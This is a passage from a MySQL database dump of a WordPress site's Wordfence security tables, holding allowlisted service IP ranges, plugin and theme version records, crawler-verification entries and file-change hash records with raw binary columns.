\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:7:{s:7:\"akismet\";s:5:\"4.1.9\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.8\";s:17:\"disable-gutenberg\";s:3:\"2.5\";s:5:\"hello\";s:5:\"1.7.2\";s:11:\"redirection\";s:3:\"3.2\";s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";}','yes'),('wordpressThemeVersions','a:11:{s:7:\"doctors\";s:3:\"0.8\";s:13:\"healing-touch\";s:3:\"1.7\";s:10:\"healthcare\";s:3:\"2.0\";s:11:\"regina-lite\";s:5:\"2.0.0\";s:10:\"skt-toothy\";s:3:\"1.4\";s:14:\"twentynineteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.7\";s:15:\"twentytwentyone\";s:3:\"1.3\";s:11:\"vision-lite\";s:5:\"1.1.3\";s:6:\"weblog\";s:5:\"1.0.1\";s:12:\"wp-barrister\";s:5:\"1.0.9\";}','yes'),('wordpressVersion','5.7.2','yes'),('wp_home_url','https://teethwhiteningproduct.co.uk','yes'),('wp_site_url','https://teethwhiteningproduct.co.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfcrawlers`
--
DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`patternSig` binary(16) NOT NULL,
`status` char(8) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
`PTR` varchar(255) DEFAULT '',
PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfcrawlers`
--
LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��@b)','i��| ��OoD!���','verified',1629462234,''),('\0\0\0\0\0\0\0\0\0\0��@b)','�����>�b0�oQ1��','badPTR',1629462233,'64.21.98.41'),('\0\0\0\0\0\0\0\0\0\0��@b/','i��| ��OoD!���','verified',1629381707,''),('\0\0\0\0\0\0\0\0\0\0��@b/','�����>�b0�oQ1��','badPTR',1629381706,'64.21.98.47'),('\0\0\0\0\0\0\0\0\0\0��B��\r','i��| ��OoD!���','verified',1629608178,''),('\0\0\0\0\0\0\0\0\0\0��B��\r','�����>�b0�oQ1��','badPTR',1629608178,'66.246.224.13'),('\0\0\0\0\0\0\0\0\0\0��B��','i��| ��OoD!���','verified',1629213894,''),('\0\0\0\0\0\0\0\0\0\0��B��','�����>�b0�oQ1��','badPTR',1629213894,'send.fcpi.net'),('\0\0\0\0\0\0\0\0\0\0��B�@v','�����>�b0�oQ1��','verified',1629569122,'crawl-66-249-64-118.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@x','�����>�b0�oQ1��','verified',1629495948,'crawl-66-249-64-120.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@z','�����>�b0�oQ1��','verified',1629462831,'crawl-66-249-64-122.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1629154725,'crawl-66-249-65-220.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1629118699,'crawl-66-249-65-222.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�A�','�����>�b0�oQ1��','verified',1629120049,'crawl-66-249-65-223.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B)','�����>�b0�oQ1��','verified',1629409882,'crawl-66-249-66-41.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B-','�����>�b0�oQ1��','verified',1629291629,'crawl-66-249-66-45.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BO','�����>�b0�oQ1��','verified',1629302717,'crawl-66-249-66-79.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BP','�����>�b0�oQ1��','verified',1629384405,'crawl-66-249-66-80.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BQ','�����>�b0�oQ1��','verified',1629307517,'crawl-66-249-66-81.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BX','�����>�b0�oQ1��','verified',1629291630,'crawl-66-249-66-88.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BY','�����>�b0�oQ1��','verified',1629300319,'crawl-66-249-66-89.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�FQ','�����>�b0�oQ1��','verified',1629521723,'crawl-66-249-70-81.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�FU','�����>�b0�oQ1��','verified',1629524160,'crawl-66-249-70-85.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I3','�����>�b0�oQ1��','verified',1629255537,'crawl-66-249-73-51.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J','�����>�b0�oQ1��','verified',1629120049,'crawl-66-249-74-17.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J','�����>�b0�oQ1��','verified',1629153162,'crawl-66-249-74-19.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J','�����>�b0�oQ1��','verified',1629118698,'crawl-66-249-74-21.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J6','�����>�b0�oQ1��','verified',1629245910,'crawl-66-249-74-54.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J8','�����>�b0�oQ1��','verified',1629255537,'crawl-66-249-74-56.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0����a','i��| ��OoD!���','verified',1629209429,''),('\0\0\0\0\0\0\0\0\0\0����a','�����>�b0�oQ1��','badPTR',1629209429,'209.250.254.97.vultr.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilechanges`
--
DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
`filenameHash` char(64) NOT NULL,
`file` varchar(1000) NOT NULL,
`md5` char(32) NOT NULL,
PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilechanges`
--
LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wffilemods`
--
DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
`filenameMD5` binary(16) NOT NULL,
`filename` varchar(1000) NOT NULL,
`knownFile` tinyint(3) unsigned NOT NULL,
`oldMD5` binary(16) NOT NULL,
`newMD5` binary(16) NOT NULL,
`SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
`stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
`isSafeFile` varchar(1) NOT NULL DEFAULT '?',
PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wffilemods`
--
LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0\r�56��^λFA/A','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/text-editor/text-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�м�\n���K��E�+7T','Ϝ�O���Ɵ��l�Ӭ��g����T�6[�','',0,'?'),('\0�8��m����ނ�','wp-content/themes/doctors/core/assets/css/theme-customize-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']����~���� �\'�','~���m+��vw��OT��?\\���\Z�G��','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\0-��c���l2�3','wp-content/themes/regina-lite/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ÏP&���c�0%��?','7�K�����Yض��^�y�J��f���s��o�','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3� vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0d\"��s�,���p1','wp-content/themes/wp-barrister/library/images/icon-yt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:���u���0','�y6���DU��[�y��B�:bÃ�Y#','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0���cؕ�f&�7`��','wp-content/themes/regina-lite/layout/js/plugins/bxslider/bxslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,^u��P}�','�L>}^��{�8j���C<츌������nm]','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��)�\\�w�s����}\0','�9)�>�[ �\0b|�WC����L���#�+�','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0��f\ZxŖ���K�','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-enable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�]dGu�\0)Ud}�X�',',d�h�xY⃪d�g��>W�\nnOB��1��x&','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��/��IR','f�?���(��m�������Zn�ҳ���h;ފ','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('C�@7h.M�A+��','wp-content/themes/regina-lite/inc/libraries/welcome-screen/sections/actions-required.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��ḁm���jm��.~','��j{m�孨]/=\0��\\HfE���.��%���','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,�� Ev�','',0,'?'),(',�H����u\n��n','wp-content/themes/wp-barrister/library/images/icon-vcard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g@*������\r','�F�H�Z+\"��Ʉ�1�9�{O\"$�\rb�W�','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('O�9�6��6�_s��','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',0,'s��C�:fw��z�U�','s��C�:fw��z�U�',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('�yK%5\"9Y��m','wp-content/themes/doctors/core/contents/part_subHeader/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<MD+;y��]*�L?','�\"�I�*�<�-j�����o�L@�!爱w','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�虚-�.�\Z��2 �','O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�',' ��W��A��2Lh�`���i�%iv�2���','',0,'?'),('F=+�IiK�Z��*','wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js',0,'�m���_�n|��RU��','�m���_�n|��RU��','w��vri����\n��`�4!���!��tx��S','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('M�\\\0���p��QV�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',0,'�Puē���P��7�','�Puē���P��7�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('`b��n��E��,','wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',0,'�믭�8�h�@@�','�믭�8�h�@@�','Z���\n����Km���}-��7��z��\"t k','',0,'?'),('li�A�`�d\Z�x#','wp-content/themes/healthcare/css/font-awesome/less/mixins.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� ��r�','M�^��0�^XH͛9��y��4��f1t�l3','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('���L��Lu@�p�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php',0,'��\n�� .*�XI��','��\n�� .*�XI��','{Yw�B��S�g�m9��2���,��|�D��aq�','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('���,�rq�m����o','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-date.php',0,'���Ù[�T�����r','���Ù[�T�����r','�Z�\\U��`��c5��L\r[�s�y���}}','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V� ��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('\0��b�,�j���','wp-content/themes/wp-barrister/library/class/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�r6�ą�Ä�;��','�z���_+�Y�.w��{I�4�ez:�z!��f�','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R ��p<#~%7','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��# 狌6�Qq<6','\r39�5��.��c��Ⴅ�F�\"Ӄy^u�\0^','',0,'?'),('})Z��#4�c��4�','wp-content/plugins/wp-cerber/assets/flags/au.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��pCy�)� �{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r ������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('�\\o�t|��P4��S','wp-content/themes/doctors/core/customizer/help/_background_image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0ӔU��n0{Wq�9','s\Zؼ\Z�c��h\Z���2��\'��y7�o','',0,'?'),('��<l�i)�`�','wp-content/themes/wp-barrister/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��D���M\r=o','�p�hM��1Y��G�c7�)���p�','',0,'?'),(' ��@m�`g�r\Z�','wp-content/themes/regina-lite/inc/customizer/custom-controls/class-regina-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k������r<$�/','��A�v=���֚�X���K)_��u�t�6v[�','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�5���U�c��5�{Q','��v,�óiēm`�<�߲~\n\"���\r','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),(':`X���҇�_�iߓ','wp-content/themes/healthcare/images/arrows.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�,�͙,Wd>','0�UG�c譂M����V�&��j6�Q���!q�','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':s��B�\Z�?���l','6l.v>��\\��c�4շ=T��~l�F��n�','',0,'?'),('_���\0.�6�l�q